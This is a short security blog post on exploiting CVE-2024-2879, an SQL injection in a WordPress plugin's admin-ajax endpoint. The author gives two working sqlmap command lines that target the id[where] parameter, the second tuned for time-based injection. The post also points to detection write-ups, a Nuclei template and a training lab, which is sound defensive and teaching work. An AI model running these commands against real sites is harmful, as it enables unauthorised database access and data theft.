Earlier today I was tasked with trying to show how CVE-2024-2879 could be exploited, and this investigation lead to the following blog post being created at Security Blue Team.
The CVE itself didn't have a PoC online that I could find, and though I did find snippets of how it worked, there was nothing too specific to show any dumping of data/actual access to the database – I couldn't even find a working sleep! I found following which I was able to follow along with in my own environment and the vulnerability made sense, the only bit missing was the exploitation to show impact – show me that data!
After a bit of fiddling I decided to give it to sqlmap before it was time to watch the general log whilst doing more manual testing. I was surprised to see the following worked:
sqlmap "http://<ip>/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)" --level=3 --risk=2
I've created a video showing the steps of finding with wpscan and exploitation with sqlmap, but there is nothing too exciting here - standard stuff:
It'd be better to use the following to avoid hitting the wrong parameter and trying other techniques:
sqlmap "http://<ip>/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)" --level=3 --risk=2 -p id[where] --technique=T
For more information on detection and how this all works, I recommend checking the post I helped write earlier here, or this for a more "developery" insight.
Update: 10th April
- My PR was added for the Nuclei template, this can be found here - you'll now find it as part of your scans.
- Take a look at the artifacts left behind in an attack with the lab I created for Blue Team Labs Online called PlugOut.